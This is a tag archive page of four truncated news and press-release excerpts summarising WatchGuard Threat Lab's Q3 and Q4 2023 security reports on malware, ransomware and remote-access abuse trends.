Tag Archive for: WatchGuard

WatchGuard Threat Lab Analysis Shows Surge in Evasive Malware

/in


WatchGuard® Technologies, a unified cybersecurity company, has announced the findings of its latest Internet Security Report, detailing the top malware trends and network and endpoint security threats analysed by WatchGuard Threat Lab researchers. Key findings from the data show a dramatic surge in evasive malware that fueled a large increase of total malware, threat actors targeting on-premises email servers as prime targets to exploit, and ransomware detections continuing to decline, potentially as a result of law enforcement’s international takedown efforts of ransomware extortion groups.



“The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities to target, including in older software and systems, which is why organisations must adopt a defense-in-depth approach to protect against such threats,” said Corey Nachreiner, chief security officer at WatchGuard. “Updating the systems and software on which organisations rely is a vital step toward addressing these vulnerabilities. Additionally, modern security platforms that are operated by managed service providers can deliver the comprehensive, unified security that organisations need and enable them to combat the latest threats.”

Among the key findings, the latest Internet Security Report featuring data from Q4 2023 showed:

Evasive, basic, and encrypted malware all increased in Q4, fueling a rise in total malware. The average malware detections per Firebox rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific.

TLS and zero-day malware instances also rise. Approximately 55% of malware arrived over encrypted connections, which was a 7% increase from Q3. Zero-day malware detections jumped to 60% of all malware detections, up from 22% the previous quarter. However, zero-day malware detections with TLS fell to 61%, which was a 10% decrease from Q3, showing the unpredictability of malware in the wild.

Two top 5 malware variants redirect to DarkGate network. Among the top 5 most-widespread malware…

Source…

WatchGuard Threat Lab Analysis Shows Surge in Evasive Malware Supercharging an Already Powerful Threat Wave

/in


Notable findings from the research also show resurgence of living-off-the-land attacks, continued cyberattack commoditization, and ransomware decline

SEATTLE, March 27, 2024 (GLOBE NEWSWIRE) — WatchGuard® Technologies, a global leader in unified cybersecurity, today announced the findings of its latest Internet Security Report, detailing the top malware trends and network and endpoint security threats analyzed by WatchGuard Threat Lab researchers. Key findings from the data show a dramatic surge in evasive malware that fueled a large increase of total malware, threat actors targeting on-premises email servers as prime targets to exploit, and ransomware detections continuing to decline, potentially as a result of law enforcement’s international takedown efforts of ransomware extortion groups.

“The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities to target, including in older software and systems, which is why organizations must adopt a defense-in-depth approach to protect against such threats,” said Corey Nachreiner, chief security officer at WatchGuard. “Updating the systems and software on which organizations rely is a vital step toward addressing these vulnerabilities. Additionally, modern security platforms that are operated by managed service providers can deliver the comprehensive, unified security that organizations need and enable them to combat the latest threats.”

Among the key findings, the latest Internet Security Report featuring data from Q4 2023 showed:

  • Evasive, basic, and encrypted malware all increased in Q4, fueling a rise in total malware. The average malware detections per Firebox rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific.

  • TLS and zero-day malware instances also rise. Approximately 55% of malware arrived over encrypted connections, which was a 7% increase from Q3. Zero-day malware detections jumped to 60% of all malware detections, up from 22% the previous quarter. However, zero-day malware detections with TLS…

Source…

Rising ransomware attacks exploit remote access software, warns WatchGuard report

/in


New research from WatchGuard Technologies, a global player in unified cybersecurity, has revealed a significant spike in endpoint ransomware attacks as well as an alarming trend of cyber attackers exploiting remote access software.

The Internet Security Report provides insights into the latest malware trends and endpoint security threats, shedding light on the increasingly sophisticated tactics adopted by cybercriminals.

The research revealed an 89% rise in endpoint ransomware attacks and a decrease in malware delivered through encrypted connections. WatchGuard also observed an increase in abuse of remote access software, an exploitation strategy actively embraced by cyber adversaries.

Cyber criminals are also exploiting password-stealers and info-stealers to pilfer priceless credentials, and are increasingly pivoting from scripting to other living-off-the-land techniques to instigate endpoint attacks.

Discussing the consequeces, Corey Nachreiner, Chief Security Officer at WatchGuard, stated, “Threat actors continuously evolve their tools and methods in attack campaigns, making it crucial for organisations to stay updated on the latest tactics to bolster their security strategy.”

He added that end users often represent the last defence line against sophisticated attacks that employ social engineering tactics. Nachreiner emphasised that it was paramount for organisations to deliver social engineering education and adopt a unified security approach that provides multiple layers of defence.

Among the key findings, the report detailed how cyber attackers are increasingly leveraging remote management tools to dodge anti-malware detection, confirmed by both the FBI and CISA.

Notably, there was a surge in the Medusa ransomware variant in Q3, driving endpoint ransomware attacks up by 89%. The report also highlighted a noticeable decline in attacks employing scripted methods, with script-based attacks dropping by 11% in Q3 and by 41% in Q2.

However, in spite of the reduction, script-based attacks still represent the largest attack vector, making up 56% of total attacks. Cyber attackers are also resorting to Windows living-off-the-land binaries more frequently, as these…

Source…

WatchGuard reveals rise in remote access software exploits

/in


WatchGuard Technologies, a leading provider of unified cybersecurity, has released their latest Internet Security Report that reveals a rise in cyber actors exploiting remote access software, increases in the use of password-stealers and info-stealers, and an 89% expansion in endpoint ransomware attacks.

The report, compiled by WatchGuard Threat Lab researchers, also found a decline in malware arriving over encrypted connections. Additionally, the study shows that cyber threat actors are pivoting from script-based methods to other ‘living-off-the-land’ techniques to launch endpoint attacks.

According to Corey Nachreiner, the Chief Security Officer at WatchGuard, the continued evolution of attack methods necessitates heightened attention to recent tactics for businesses to reinforce their security strategies. He emphasised the importance of social engineering education in conjunction with a unified security approach incorporating layered defence strategies, all of which can be effectively managed by service providers.

The Internet Security Report for Q3 2023 highlighted several notable key points. For instance, cyber attackers increasingly use remote management tools and software to circumvent anti-malware detection. An example provided by the report notes a tech support scam resulting in the user downloading an unauthorised version of TeamViewer, allowing the attacker full remote access to the computer.

Q3 of 2023 also saw the variant ‘Medusa’ surge, driving a quarter-to-quarter increase of 89% in endpoint ransomware attacks. In response to heightened protections around PowerShell and other scripting, threat actors instead pivoted to utilising different ‘living-off-the-land’ techniques. Malware arrival via encrypted connections declined to 48%, yet total malware detections rose by 14%.

The report also reveals the increase of ‘commoditised malware’. A new malware family, Lazy.360502, emerged in the top ten list, proving to be a dual threat as it delivers an adware variant (2345explorer) as well as the Vidar password stealer. The increased use of this malware, supplied by a Chinese website, indicates a growing trend towards ‘password-stealer-as-a-service’.

Overall, the…

Source…